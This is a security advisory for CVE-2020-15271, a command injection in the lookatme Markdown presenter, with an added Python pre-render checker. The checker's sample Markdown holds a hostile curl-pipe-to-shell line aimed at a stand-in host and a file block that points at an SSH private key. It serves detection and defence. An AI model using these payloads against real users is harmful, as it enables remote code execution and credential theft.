CVE-2020-15271

CRITICAL

lookatme < 2.3.0 - OS Command Injection via Markdown Rendering

Description

In lookatme (the `lookatme` Python package on PyPI) versions prior to 2.3.0, the package automatically loaded the built-in "terminal" and "file_loader" contrib extensions. Anyone who uses lookatme to render untrusted Markdown may therefore have shell commands embedded in that Markdown run automatically on their system, without any further action on their part. This is fixed in version 2.3.0. As a workaround on earlier versions, the `lookatme/contrib/terminal.py` and `lookatme/contrib/file_loader.py` files may be deleted manually so that neither extension can load. In any case, be aware of what is being rendered with lookatme before rendering it.
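As an added example (not lookatme project code and not from the advisory), a pre-render check in Python: it tests whether the installed lookatme is older than the fixed 2.3.0 and scans a Markdown document for fenced code blocks whose info string the auto-loaded terminal and file_loader extensions would act on. The info-string patterns it looks for (`terminalN`, `terminal-ex`, `file`) are an assumption about those two extensions' trigger syntax, not something the advisory states; the sample Markdown is constructed for the example.

```python
"""Pre-render check for CVE-2020-15271 (lookatme < 2.3.0).

Added example, not lookatme's own code.  Two independent checks:
  1. Is the installed lookatme version below the fixed release 2.3.0?
  2. Does a Markdown document contain fenced blocks whose info string
     would be handled by the auto-loaded "terminal" or "file_loader"
     contrib extensions?  The patterns in DANGEROUS_INFO are an
     assumption about those extensions' trigger syntax.
"""
import re
from importlib import metadata

FIXED_VERSION = (2, 3, 0)

# Assumed trigger syntax: ``terminalN`` / ``terminal-ex`` fences are run as
# shell commands by the terminal extension; ``file`` fences are read from
# disk by file_loader.  Adjust if your installed extensions differ.
DANGEROUS_INFO = re.compile(r"^(terminal\d*|terminal-ex|file)$")

# Opening or closing fence: three or more backticks or tildes, then an
# optional info string (empty on a closing fence).
FENCE = re.compile(r"^\s*(`{3,}|~{3,})\s*([^\s`]*)")


def parse_version(text):
    """'2.2.1' -> (2, 2, 1); a trailing suffix like 'rc1' is ignored."""
    nums = []
    for part in text.split("."):
        digits = re.match(r"\d+", part)
        if not digits:
            break
        nums.append(int(digits.group()))
    return tuple(nums)


def version_is_vulnerable(version):
    """True when the given lookatme version string is below 2.3.0."""
    return parse_version(version) < FIXED_VERSION


def installed_lookatme_vulnerable():
    """True/False for the installed package, None if it is not installed."""
    try:
        return version_is_vulnerable(metadata.version("lookatme"))
    except metadata.PackageNotFoundError:
        return None


def find_dangerous_blocks(markdown):
    """Return (line_number, info_string) for each fenced block whose info
    string matches DANGEROUS_INFO, tracking open/close fences so that a
    fence-like line inside another code block is not miscounted."""
    findings = []
    fence_char, fence_len = None, 0
    for lineno, line in enumerate(markdown.splitlines(), 1):
        m = FENCE.match(line)
        if fence_char is None:
            if m:
                fence_char, fence_len = m.group(1)[0], len(m.group(1))
                info = m.group(2).lower()
                if DANGEROUS_INFO.match(info):
                    findings.append((lineno, info))
        elif (m and m.group(1)[0] == fence_char
              and len(m.group(1)) >= fence_len and not m.group(2)):
            fence_char = None  # closing fence: same char, at least as long
    return findings


# Constructed sample document.  The backtick fences are built with BT so
# that this listing's own code fence is not terminated early.
BT = "`" * 3
SAMPLE_MARKDOWN = "\n".join([
    "# Quarterly update (constructed sample)",
    "",
    BT + "terminal8",
    "curl http://example.invalid/payload | sh",
    BT,
    "",
    BT + "python",
    "print('harmless')",
    BT,
    "",
    "~~~file",
    "path: ~/.ssh/id_ed25519",
    "~~~",
])


if __name__ == "__main__":
    state = installed_lookatme_vulnerable()
    print("installed lookatme vulnerable:", "not installed" if state is None else state)
    for lineno, info in find_dangerous_blocks(SAMPLE_MARKDOWN):
        print(f"line {lineno}: fenced block with info string {info!r}")
```

The scan is a pre-flight check, not a sanitizer: on a vulnerable version the correct response to any finding is to refuse to render the document, since the terminal extension runs the block's contents as shell commands rather than displaying them.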

References

https://github.com/d0c-s4vage/lookatme/pull/110 (Exploit, Third Party Advisory)
https://github.com/d0c-s4vage/lookatme/releases/tag/v2.3.0 (Release Notes, Third Party Advisory)
https://pypi.org/project/lookatme/#history (Release Notes, Third Party Advisory)

Scores

CVSS v3.1 base score 9.3 (Critical)
CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Attack Vector NETWORK
EPSS 0.0198 (78.0th percentile)

The vector reflects the description: no privileges are needed (PR:N), but user interaction is required (UI:R) because the victim has to render the attacker-supplied Markdown; once they do, commands run with the victim's own privileges, outside the renderer's intended scope (S:C), with high confidentiality and integrity impact and no rated availability impact.

Details

CWE
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Status published
Products (2)
lookatme_project/lookatme < 2.3.0
pypi/lookatme >= 0, < 2.3.0 (PyPI)
Published Oct 26, 2020
Tracked Since Feb 18, 2026